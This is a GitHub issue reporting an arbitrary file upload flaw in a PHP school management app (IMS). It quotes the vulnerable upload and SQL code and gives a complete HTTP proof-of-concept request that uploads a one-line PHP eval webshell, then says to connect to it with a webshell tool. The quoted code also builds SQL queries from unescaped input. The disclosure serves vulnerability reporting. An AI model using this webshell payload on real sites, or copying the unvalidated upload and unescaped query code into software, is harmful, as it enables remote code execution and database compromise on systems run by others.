Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

IMS has an arbitrary file upload vulnerability #2

Open
huclilu opened this issue Nov 14, 2022 · 0 comments
Open

IMS has an arbitrary file upload vulnerability #2

huclilu opened this issue Nov 14, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Nov 14, 2022

Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4

1.File upload vulnerability

In the file admin_ Area/courseinsert.php, in line 234-239 of the code

<table border='2' align="center"><form method="post" action="course_insert.php" enctype="multipart/form-data">
                               <tr><td>COURSE NAME : </td><td><input type="text" name="cname" required="" autocomplete="off"></td></tr>
                               <tr><td>DURATION : </td><td><input type="text" name="drn" required="" autocomplete="off"></td></tr>
                               <tr><td>FEES : </td><td><input type="text" name="fee" required="" autocomplete="off"></td></tr>
                               <tr><td>UPLOAD PHOTO :</td><td><input type="file" name="pht" required="" autocomplete="off"></td></tr>
                               <tr><td></td><td><button class="btn btn-primary btn-lg">Insert Course</button></td></tr>

After entering the information, click the button to send the information to course in post mode_ insert.php

, continue to follow up the code

course_insert.php:

In lines 10 - 13:

$fname=$_FILES['pht']['name'];
$file_temp_loc =$_FILES['pht']['tmp_name'];
$file_store="courseimg/".$fname;
move_uploaded_file($file_temp_loc,$file_store);

$_ FILES Get the file information uploaded by post, $file_ store

Define the file storage location. In this process, the uploaded file type is not verified. Use move_ uload_ file()

Function to transfer all uploaded files to courseimg/directory

In lines 14 to 28

$s=mysqli_query($con,"insert into course(c_name,duration,fees,photo) values('$cname','$drn','$fee','$file_store')");
    if($s==1)
    {
        $t=mysqli_query($con,"select * from course where c_name='$cname'");
        $r=mysqli_fetch_array($t);
        $id=$r['id'];
        $i=100+$id;
        $uid="BTT/CRS/".$i;
        $udt=mysqli_query($con,"update course set c_id='$uid' where c_name='$cname'");
        header("location:courseinsert.php?ms=done");
    }
    else
    {
        header("location:courseinsert.php?ms=not_done");
    }

mysqli_ query returns the execution result of the database statement. $s is the value returned by executing the SQL statement. If the SQL statement is executed successfully, it returns true, $s==1. When new data is inserted into the database, the url jumps to: courseinsert.php? ms=done

Otherwise, the url will jump to courseinsert. php? ms=not_ done

To sum up, in the process of uploading a file, first upload the file to the local courseimg directory, and then save the path of the successfully uploaded file in the database

Therefore, even if the uploaded file is not stored in the database, the uploaded file will be saved in the courseimg/directory under the current path, which is: admin_ area/courseimg/

Upload-POC:

POST /admin_area/course_insert.php HTTP/1.1
Host: imsvul.test
Content-Length: 500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1EAN9nvnAL0aI3UM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/courseinsert.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close

------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="cname"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="drn"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="fee"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="pht"; filename="ace.php"
Content-Type: application/octet-stream

<?php eval($_POST["ace"]);?>
------WebKitFormBoundary1EAN9nvnAL0aI3UM--

After sending the POC packet, click admin_ area/courseimg/ Generate a PHP file named ace under the directory

Connect using the webshell administration tool

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant